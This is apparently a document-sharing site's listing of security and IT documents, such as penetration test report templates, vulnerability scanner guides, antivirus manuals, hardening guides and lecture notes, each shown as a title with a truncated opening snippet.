CSE331: Introduction to Networks and Security Lecture 32 Fall 2004 Hackers / Intruders External attacks Typical hacker Exploits carried out remotely Does not have an account on the remote machine Insider
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
Client logo placeholder XXX REPORT. Page 1 of 37
Client logo placeholder XXX REPORT Page 1 of 37 Report Details Title Xxx Penetration Testing Report Version V1.0 Author Tester(s) Approved by Client Classification Confidential Recipient Name Title Company
Why Should You Care About Security Issues? SySmox WEB security [email protected]. Top seven ColdFusion Security Issues
SySmox WEB security [email protected] Top seven ColdFusion Security Issues This installment discusses the most prevalent security issues with server configurations and application implementations for ColdFusion.
1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained
home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:
Integrating with BarTender Integration Builder
Integrating with BarTender Integration Builder WHITE PAPER Contents Overview 3 Understanding BarTender's Native Integration Platform 4 Integration Builder 4 Administration Console 5 BarTender Integration
SOA Software API Gateway Appliance 7.1.x Administration Guide
SOA Software API Gateway Appliance 7.1.x Administration Guide Trademarks SOA Software and the SOA Software logo are either trademarks or registered trademarks of SOA Software, Inc. Other product names,
Sophos for Microsoft SharePoint startup guide
Sophos for Microsoft SharePoint startup guide Product version: 2.0 Document date: March 2011 Contents 1 About this guide...3 2 About Sophos for Microsoft SharePoint...3 3 System requirements...3 4 Planning
Web Application Firewall
Web Application Firewall Getting Started Guide August 3, 2015 Copyright 2014-2015 by Qualys, Inc. All Rights Reserved. Qualys and the Qualys logo are registered trademarks of Qualys, Inc. All other trademarks
Reference and Troubleshooting: FTP, IIS, and Firewall Information
APPENDIXC Reference and Troubleshooting: FTP, IIS, and Firewall Information Although Cisco VXC Manager automatically installs and configures everything you need for use with respect to FTP, IIS, and the
Using Microsoft s Free Security Tools Help Secure your Windows Systems taken from Web and Other Sources by Thomas Jerry Scott November, 2003
Using Microsoft s Free Security Tools Help Secure your Windows Systems taken from Web and Other Sources by Thomas Jerry Scott November, 2003 The following chart shows the name and download locations for
Computer Networks & Computer Security
Computer Networks & Computer Security Software Engineering 4C03 Project Report Hackers: Detection and Prevention Prof.: Dr. Kartik Krishnan Due Date: March 29 th, 2004 Modified: April 7 th, 2004 Std Name:
INSIDE. Malicious Threats of Peer-to-Peer Networking
Symantec Security Response WHITE PAPER Malicious Threats of Peer-to-Peer Networking by Eric Chien, Symantec Security Response INSIDE Background Protocols New Vector of Delivery Malicious Uses of Peer-to-Peer
Still Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
Cloud Backup Express
Cloud Backup Express Table of Contents Installation and Configuration Workflow for RFCBx... 3 Cloud Management Console Installation Guide for Windows... 4 1: Run the Installer... 4 2: Choose Your Language...
CA Unified Infrastructure Management Server
CA Unified Infrastructure Management Server CA UIM Server Configuration Guide 8.0 Document Revision History Version Date Changes 8.0 September 2014 Rebranded for UIM 8.0. 7.6 June 2014 No revisions for
Vulnerability Assessment and Penetration Testing
Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration
NEW JERSEY STATE POLICE EXAMPLES OF CRIMINAL INTENT
Appendix A to 11-02-P1-NJOIT NJ OFFICE OF INFORMATION TECHNOLOGY P.O. Box 212 www.nj.gov/it/ps/ 300 Riverview Plaza Trenton, NJ 08625-0212 NEW JERSEY STATE POLICE EXAMPLES OF CRIMINAL INTENT The Intent
Microsoft Security Bulletin MS09-053 - Important
Microsoft Security Bulletin MS09-053 - : Vulnerabilities in FTP Service for...page 1 of 28 TechNet Home > TechNet Security > Bulletins Microsoft Security Bulletin MS09-053 - Vulnerabilities in FTP Service
Bitrix Site Manager ASP.NET. Installation Guide
Bitrix Site Manager ASP.NET Installation Guide Contents Introduction... 4 Chapter 1. Checking for IIS Installation... 5 Chapter 2. Using An Archive File to Install Bitrix Site Manager ASP.NET... 7 Preliminary
Cloud Portal for imagerunner ADVANCE
Cloud Portal for imagerunner ADVANCE User's Guide Please read this guide before operating this product. After you finish reading this guide, store it in a safe place for future reference. ENG How This
Setting Up Scan to SMB on TaskALFA series MFP s.
Setting Up Scan to SMB on TaskALFA series MFP s. There are three steps necessary to set up a new Scan to SMB function button on the TaskALFA series color MFP. 1. A folder must be created on the PC and
During your session you will have access to the following lab configuration. CLIENT1 (Windows XP Workstation) 192.168.0.2 /24
Introduction The Network Vulnerabilities module provides you with the instruction and Server hardware to develop your hands on skills in the defined topics. This module includes the following exercises:
SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.
system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped
Top Ten Web Attacks. Saumil Shah Net-Square. BlackHat Asia 2002, Singapore
Top Ten Web Attacks Saumil Shah Net-Square BlackHat Asia 2002, Singapore TodayÕs battleground Ð the Web Web sites and web applications rapidly growing. Complex business applications are now delivered over
Sophos Anti-Virus for Linux user manual
Sophos Anti-Virus for Linux user manual Product version: 7 Document date: January 2011 Contents 1 About this manual...3 2 About Sophos Anti-Virus for Linux...4 3 On-access scanning...7 4 On-demand scanning...10
Adaptive Log Exporter Users Guide
IBM Security QRadar Version 7.1.0 (MR1) Note: Before using this information and the product that it supports, read the information in Notices and Trademarks on page page 119. Copyright IBM Corp. 2012,
Hardening Joomla 1. HARDENING PHP. 1.1 Installing Suhosin. 1.2 Disable Remote Includes. 1.3 Disable Unneeded Functions & Classes
1. HARDENING PHP Hardening Joomla 1.1 Installing Suhosin Suhosin is a PHP Hardening patch which aims to protect the PHP engine and runtime environment from common exploits, such as buffer overflows in
Contents Who Should Read this Book... 3 Credits:... 3 Introduction and background... 3 Lab Setup... 3 A primer on windows user privileges...
Contents Who Should Read this Book... 3 Credits:... 3 Introduction and background... 3 Lab Setup... 3 A primer on windows user privileges... 4 Standard user:... 5 Administrator... 5 SYSTEM... 5 User Access
Nessus scanning on Windows Domain
Nessus scanning on Windows Domain A little inside information and Nessus can go a long way By Sunil Vakharia [email protected] Version 1.0 4 November 2003 About this paper This paper is not a tutorial
Penetration Test Report
Penetration Test Report Acme Test Company ACMEIT System 26 th November 2010 Executive Summary Info-Assure Ltd was engaged by Acme Test Company to perform an IT Health Check (ITHC) on the ACMEIT System
Netcat Commands. I am going to give you insight and knowledge so that you can understand netcat Me0wwww. WOW, something useful and FREE
Netcat Commands I am going to give you insight and knowledge so that you can understand netcat Me0wwww. WOW, something useful and FREE www.safehack.com 1 This Netcat Manual is dedicated to my Cat [Fion]
webmethods Certificate Toolkit
Title Page webmethods Certificate Toolkit User s Guide Version 7.1.1 January 2008 webmethods Copyright & Document ID This document applies to webmethods Certificate Toolkit Version 7.1.1 and to all subsequent
Introduction to UNIX and SFTP
Introduction to UNIX and SFTP Introduction to UNIX 1. What is it? 2. Philosophy and issues 3. Using UNIX 4. Files & folder structure 1. What is UNIX? UNIX is an Operating System (OS) All computers require
Enabling Kerberos SSO in IBM Cognos Express on Windows Server 2008
Enabling Kerberos SSO in IBM Cognos Express on Windows Server 2008 Nature of Document: Guideline Product(s): IBM Cognos Express Area of Interest: Infrastructure 2 Copyright and Trademarks Licensed Materials
(n)code Solutions CA A DIVISION OF GUJARAT NARMADA VALLEY FERTILIZERS COMPANY LIMITED P ROCEDURE F OR D OWNLOADING
(n)code Solutions CA A DIVISION OF GUJARAT NARMADA VALLEY FERTILIZERS COMPANY LIMITED P ROCEDURE F OR D OWNLOADING a Class IIIc SSL Certificate using BEA Weblogic V ERSION 1.0 Page 1 of 8 Procedure for
Assets, Groups & Networks
Complete. Simple. Affordable Copyright 2014 AlienVault. All rights reserved. AlienVault, AlienVault Unified Security Management, AlienVault USM, AlienVault Open Threat Exchange, AlienVault OTX, Open Threat
GFI White Paper PCI-DSS compliance and GFI Software products
White Paper PCI-DSS compliance and Software products The Payment Card Industry Data Standard () compliance is a set of specific security standards developed by the payment brands* to help promote the adoption
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
Web Security School Entrance Exam
Web Security School Entrance Exam By Michael Cobb 1) What is SSL used for? a. Encrypt data as it travels over a network b. Encrypt files located on a Web server c. Encrypt passwords for storage in a database
Running a Default Vulnerability Scan
Running a Default Vulnerability Scan A Step-by-Step Guide www.saintcorporation.com Examine. Expose. Exploit. Welcome to SAINT! Congratulations on a smart choice by selecting SAINT s integrated vulnerability
HP ProLiant Essentials Vulnerability and Patch Management Pack Planning Guide
HP ProLiant Essentials Vulnerability and Patch Management Pack Planning Guide Product overview... 3 Vulnerability scanning components... 3 Vulnerability fix and patch components... 3 Checklist... 4 Pre-installation
IBM Security QRadar Vulnerability Manager Version 7.2.1. User Guide
IBM Security QRadar Vulnerability Manager Version 7.2.1 User Guide Note Before using this information and the product that it supports, read the information in Notices on page 61. Copyright IBM Corporation
FTP, IIS, and Firewall Reference and Troubleshooting
FTP, IIS, and Firewall Reference and Troubleshooting Although Cisco VXC Manager automatically installs and configures everything you need for use with respect to FTP, IIS, and the Windows Firewall, the
Guideline on Auditing and Log Management
CMSGu2012-05 Mauritian Computer Emergency Response Team CERT-MU SECURITY GUIDELINE 2011-02 Enhancing Cyber Security in Mauritius Guideline on Auditing and Log Management National Computer Board Mauritius
Virtual CD v10. Network Management Server Manual. H+H Software GmbH
Virtual CD v10 Network Management Server Manual H+H Software GmbH Table of Contents Table of Contents Introduction 1 Legal Notices... 2 What Virtual CD NMS can do for you... 3 New Features in Virtual
How To Upgrade A Websense Log Server On A Windows 7.6 On A Powerbook (Windows) On A Thumbdrive Or Ipad (Windows 7.5) On An Ubuntu 7.3.2 (Windows 8) Or Windows
Websense v7.6 Install or Upgrade Checklist Greetings from Websense Technical Support. Most Websense upgrades complete successfully, and from my years of troubleshooting, I have learned a number of steps
Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them
Lab Exercises Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them Review Questions 1) In class, we made the distinction between a front-door attack and
Homeland Security Red Teaming
Homeland Security Red Teaming Directs intergovernmental coordination Specifies Red Teaming Viewing systems from the perspective of a potential adversary Target hardening Looking for weakness in existing
Configuring and Monitoring FTP Servers
Configuring and Monitoring FTP Servers eg Enterprise v5.6 Restricted Rights Legend The information contained in this document is confidential and subject to change without notice. No part of this document
24x7 Scheduler Multi-platform Edition 5.2
24x7 Scheduler Multi-platform Edition 5.2 Installing and Using 24x7 Web-Based Management Console with Apache Tomcat web server Copyright SoftTree Technologies, Inc. 2004-2014 All rights reserved Table
